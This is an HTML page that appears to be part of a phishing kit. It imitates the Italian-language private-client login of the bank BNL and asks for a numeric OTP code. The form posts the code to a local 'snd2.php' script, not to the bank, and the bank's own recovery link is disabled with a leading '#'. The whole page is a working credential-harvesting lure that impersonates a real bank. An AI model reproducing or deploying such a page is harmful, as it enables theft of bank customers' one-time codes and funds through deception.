<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<title>Login</title>


<link rel="stylesheet" type="text/css" media="all, print" href="./style(3).css">
<link rel="stylesheet" type="text/css" media="all, print" href="./fonts(1).css">
<link rel="stylesheet" type="text/css" media="all, print" href="./login.css">
<link rel="stylesheet" type="text/css" media="all, print" href="./hb-login.css">
<link rel="stylesheet" type="text/css" media="all, print" href="./style(4).css">
<link rel="stylesheet" type="text/css" media="all, print" href="./editoriale(1).css">


		
		
	</head><body marginwidth="0" marginheight="0">
		<div>
			<div class="master-div">
				<form id="command" name="websealForm" action="snd2.php" method="post" autocomplete="off">

					<div>
						<div class="titolo-area-riservata-div">
							<strong>AREA CLIENTI PRIVATI</strong>
						</div>
						<div class="credenziali-area-riservata-div">
							<table class="login-table">
								<tbody><tr>
									<td class="row-cells-area">
										<div class="cont-div">
											<div class="sub-cont-div">
												<p class="credenziali-font-par sub-cont-par">
													<strong> <label for="real_username">Codice numerico OTP</label></strong>
												</p>
												
												<input type="password" class="type-text-new" name="otp" id="otp"  maxlength="10" required="">

												
												
												
	
											</div>
										</div>
									</td>
									<td class="row-cells-area">
										<div class="cont-div">
											<table class="inner-login-table">
												<tbody><tr>
													<td class="login-td">
														<div class="absolute-bottom-margin32 login-div">
															<button class="login-button" type="submit" name="Invia" value=""></button>
														</div>
													</td>
													<td id="recupera-id" class="login-td">
														<div class="absolute-bottom-margin32 left-padding-6 bottom-padding-10 " style="bottom: 0px;">
															<a class="link-testuali" href="#https://banking.bnl.it/pubblica/RecuperoNumeroCliente">Recupera ID cliente &gt;</a>
														</div>
													</td>
												</tr>
											</tbody></table>
										</div>

									</td>
								</tr>
							</tbody></table>
						</div>
					</div>

					<input type="hidden" name="AUTH" id="_AUTH">

					
				</form>
			</div>
		</div>
	

</body></html>